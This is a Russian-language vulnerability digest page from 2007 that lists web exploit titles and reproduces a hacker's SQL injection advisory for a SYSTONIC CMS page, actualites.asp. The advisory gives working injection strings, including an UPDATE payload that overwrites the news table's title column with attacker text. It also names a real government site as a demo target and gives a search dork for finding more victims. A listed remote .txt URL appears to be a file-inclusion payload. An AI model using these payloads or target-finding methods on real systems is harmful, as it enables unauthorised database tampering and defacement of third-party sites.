Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Flashbb <= 1.1.7 - Remote File Inclusion Exploit

Entertainment CMS Admin Login Bypass

http: //marmarahosting. org/infinity.txt

MERCURY/Templates mercury.ASP SQL Injection

From:	okan alp <codexploder_(at)_hotmail.com>
Date:	10 июля 2007 г.
Subject:	SYSTONÝCfr/portal/ actualites.asp sql injection

SYSTONЭCfr/portal/ actualites.asp sql injection


Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam

spec.note : "Live The Life"

/////////////////////////////////////////////////////////////////

1-)  example.com/actualites.asp?pk_actualite=(sql methot)

1-)  example.com/actualites.asp?pk_actualite=(sql methot)

//////////////////////////////////////////////////////////////////

2-)  example.com/actualites.asp?pk_actualite=1'

2-) example.com/actualites.asp?pk_actualite=1 having 1=1

2-) example.com/actualites.asp?pk_actualite=,2,3,4,5


2-) example.com/actualites.asp?pk_actualite=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--



#tbl    : actus
#column : titre

###################################################################

sourge site : http://www.systonic.fr

demo site   : http://www.haute-garonne.fr/

order code for views site :inurl:"actualites.asp?pk_actualite"